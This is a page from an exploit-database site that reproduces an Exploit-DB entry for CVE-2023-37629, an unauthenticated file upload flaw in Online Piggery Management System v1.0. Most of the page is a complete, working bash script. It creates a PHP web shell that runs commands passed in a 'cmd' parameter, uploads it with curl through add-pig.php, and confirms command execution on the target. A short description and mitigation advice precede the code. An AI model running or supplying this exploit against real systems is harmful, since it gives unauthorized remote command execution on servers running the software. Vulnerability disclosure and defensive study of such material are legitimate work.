header-logo
Suggest Exploit
vendor:
Online Piggery Management System
by:
1337kid
9.8
CVSS
CRITICAL
Unauthenticated File Upload
CWE
Product Name: Online Piggery Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2023-37629
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu
2023

Online Piggery Management System v1.0 โ€“ unauthenticated file upload vulnerability

This exploit allows an attacker to upload a malicious shell.php file to the target system using the Online Piggery Management System v1.0. By exploiting this vulnerability, an attacker can execute arbitrary commands on the target system.

Mitigation:

The vendor should release a patch to fix this vulnerability. In the meantime, users of the Online Piggery Management System v1.0 should be cautious and ensure that the application is not accessible to untrusted users.
Source

Exploit-DB raw data:

#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/

echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "
echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "
echo "                         @1337kid"
echo 

if [[ $1 == '' ]]; then
    echo "No URL specified!"
    exit
fi

base_url=$1

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln
    echo "Generating shell.php"
#===========
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
#===========
    echo "done"
    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')
    if [[ $req == "200" ]]; then
        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi

}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi

Navigation

Suggest Exploit

Services By CQR

cqrsecured